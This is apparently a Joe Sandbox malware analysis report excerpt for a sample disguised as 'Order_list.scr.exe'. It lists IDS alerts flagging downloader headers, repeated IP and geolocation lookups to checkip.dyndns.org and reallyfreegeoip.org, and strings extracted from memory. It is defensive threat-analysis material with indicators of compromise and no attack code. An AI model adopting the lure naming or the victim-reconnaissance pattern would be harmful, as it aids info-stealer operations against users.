            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49756 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49762 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49768 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 104.21.64.1:443
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49733 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49751 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: Order_list.scr.exe, 00000003.00000002.4141697018.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003379000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027E5000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Order_list.scr.exe, 00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Order_list.scr.exe, 00000000.00000002.4164055265.0000000003732000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgX
            Source: powershell.exe, 00000001.00000002.1709053274.0000000007410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microu
            Source: svchost.exe, 00000004.00000002.3324839942.0000023A6F000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F24D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: powershell.exe, 00000001.00000002.1706543723.0000000005A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000006.00000002.1841172457.0000000004B52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000339D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002810000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: powershell.exe, 00000001.00000002.1700469608.00000000049F1000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1841172457.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000006.00000002.1841172457.0000000004B52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Order_list.scr.exe, 00000000.00000002.4175150990.0000000005A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlit-itt
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: powershell.exe, 00000001.00000002.1700469608.00000000049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1841172457.0000000004A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F2C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
            Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
            Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
            Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
            Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F2C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
            Source: powershell.exe, 00000006.00000002.1841172457.0000000004B52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.1706543723.0000000005A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F2C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
            Source: edb.log.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
